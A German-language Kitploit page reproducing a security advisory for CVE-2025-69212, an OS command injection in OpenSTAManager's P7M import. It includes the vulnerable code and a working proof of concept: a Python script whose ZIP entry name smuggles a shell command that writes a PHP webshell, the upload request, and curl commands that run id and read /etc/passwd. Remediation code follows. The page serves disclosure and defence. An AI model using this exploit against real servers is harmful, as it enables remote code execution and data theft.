Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-69212 — CVE-2025-69212 - OpenSTAManager has an OS Command Injection in P7M File Processing | Kitploit
Tools/GitHubGitHub/lukasz-rybak/cve-2025-69212
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHublukasz-rybak/cve-2025-69212

CVE-2025-69212

CVE-2025-69212 - OpenSTAManager has an OS Command Injection in P7M File Processing

Repository anzeigen
4vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-69212: OpenSTAManager hat eine OS-Befehlseinschleusung in der P7M-Dateiverarbeitung

Übersicht

FeldDetails
CVE IDCVE-2025-69212
SchweregradKRITISCH
SicherheitshinweisSicherheitshinweis anzeigen
Entdeckt vonLukasz Rybak

Betroffene Produkte

  • devcode-it/openstamanager (Versionen: <= 2.9.8)

CWE-Klassifizierung

  • CWE-78: Unzureichende Neutralisierung von Sonderzeichen in einem OS-Befehl ('OS-Befehlseinschleusung')

Details

Zusammenfassung

Eine kritische OS-Befehlseinschleusungssicherheitslücke existiert in der Dekodierungsfunktion von P7M-Dateien (signiertes XML). Ein authentifizierter Angreifer kann eine ZIP-Datei mit einer .p7m-Datei mit einem bösartigen Dateinamen hochladen, um beliebige Systembefehle auf dem Server auszuführen.

Angreifbarer Code

Datei: src/Util/XML.php:100

root@kitploit:~
public static function decodeP7M($file)
{
    $directory = pathinfo($file, PATHINFO_DIRNAME);
    $content = file_get_contents($file);

    $output_file = $directory.'/'.basename($file, '.p7m');

    try {
        if (function_exists('exec')) {
            // VULNERABLE - No input sanitization!
            exec('openssl smime -verify -noverify -in "'.$file.'" -inform DER -out "'.$output_file.'"', $output, $cmd);

Das Problem:

  • Der Parameter $file wird direkt an exec() ohne Bereinigung übergeben
  • Obwohl in doppelte Anführungszeichen gesetzt, kann ein Angreifer diese umgehen
  • Der Dateiname stammt aus hochgeladenen ZIP-Archiven (benutzergesteuert)

Angriffsvektor

Einstiegspunkte:

  1. plugins/importFE_ZIP/actions.php:126 (wenn der automatische Import aktiviert ist)

    root@kitploit:~
    foreach ($files_xml as $xml) {
        if (string_ends_with($xml, '.p7m')) {
            $file = XML::decodeP7M($directory.'/'.$xml);  // $xml from ZIP!
    
  2. plugins/importFE/src/FatturaElettronica.php:56 (Konstruktor)

    root@kitploit:~
    if (string_ends_with($name, '.p7m')) {
        $file = XML::decodeP7M($this->file);  // $name from user input!
    

Angriffsablauf:

  1. Angreifer erstellt ZIP mit bösartigem Dateinamen
  2. Hochladen der ZIP über das importFE_ZIP-Plugin
  3. Anwendung entpackt ZIP und durchläuft Dateien
  4. Für .p7m-Dateien wird decodeP7M() aufgerufen
  5. Bösartiger Dateiname wird in den exec()-Befehl eingeschleust
  6. Beliebiger Befehl wird als Webserver-Benutzer ausgeführt

Proof of Concept

⚠️ WICHTIGER HINWEIS: PHP's ZipArchive::extractTo() teilt Dateinamen am /-Zeichen. Das Payload darf KEIN / in Befehlen enthalten. Verwenden Sie cd directory && command anstelle von absoluten Pfaden.

Schritt 1: Bösartige ZIP erstellen

root@kitploit:~
import zipfile

cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_filename = f'invoice.p7m";{cmd};echo ".p7m'

with zipfile.ZipFile('exploit.zip', 'w') as zf:
    zf.writestr(malicious_filename, b"DUMMY_P7M_CONTENT")

Schritt 2: ZIP hochladen

root@kitploit:~
POST /actions.php HTTP/1.1
Host: localhost:8081
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc
Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b

------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="blob1"; filename="exploit.zip"
Content-Type: application/zip

[ZIP CONTENT]
------WebKitFormBoundaryBKunENXxjEx5VrRc--
Content-Disposition: form-data; name="op"

save

------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_module"

14
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_plugin"

48
------WebKitFormBoundaryBKunENXxjEx5VrRc--
image image

Schritt 3: Ausbeutungsergebnis

Antwort (500-Fehler wird erwartet - XML-Parsing schlägt NACH Befehlsausführung fehl):

root@kitploit:~
HTTP/1.1 500 Internal Server Error
{"error":{"type":"Exception","message":"Start tag expected, '<' not found"}}

Bestätigung - Webshell erstellt:

image

Schritt 4: Remote-Codeausführung

Webshell ist ohne Authentifizierung öffentlich zugänglich:

root@kitploit:~
$ curl "http://localhost:8081/files/SHELL.php?c=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ curl "http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd"
[Vollständige /etc/passwd-Ausgabe]
image

Auswirkungen

  • Remote-Codeausführung: Vollständige Serverkompromittierung
  • Datenexfiltration: Zugriff auf alle Anwendungsdaten und die Datenbank
  • Privilegienerweiterung: Mögliche Eskalation, wenn der Webserver mit erhöhten Rechten läuft
  • Persistenz: Hintertüren installieren und Zugriff aufrechterhalten
  • Laterale Bewegung: Wechsel zu anderen Systemen im Netzwerk

Voraussetzungen

  • Authentifizierter Benutzer mit Zugriff auf die Rechnungsimportfunktionalität

Behebung

Eingabebereinigung

root@kitploit:~
public static function decodeP7M($file)
{
    // Validate that file path doesn't contain shell metacharacters
    if (preg_match('/[;&|`$(){}\\[\\]<>]/', $file)) {
        throw new \Exception('Invalid file path');
    }

    // Better: use escapeshellarg()
    $safe_file = escapeshellarg($file);
    $safe_output = escapeshellarg($output_file);

    exec("openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output", $output, $cmd);
}

oder

Dateiname vor der Verarbeitung validieren

root@kitploit:~
// In the upload handler, validate filenames from ZIP
foreach ($files_xml as $xml) {
    // Only allow alphanumeric, dots, dashes, underscores
    if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
        continue; // Skip invalid filenames
    }

    if (string_ends_with($xml, '.p7m')) {
        $file = XML::decodeP7M($directory.'/'.$xml);
    }
}

Danksagung

Entdeckt von: Łukasz Rybak

Referenzen

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69212
  • https://github.com/advisories/GHSA-25fp-8w8p-mx36

Haftungsausschluss

Diese CVE wurde verantwortungsbewusst im Rahmen koordinierter Offenlegungspraktiken offengelegt. Die hier bereitgestellten Informationen dienen ausschließlich Bildungs- und Verteidigungszwecken.

Tool herunterladen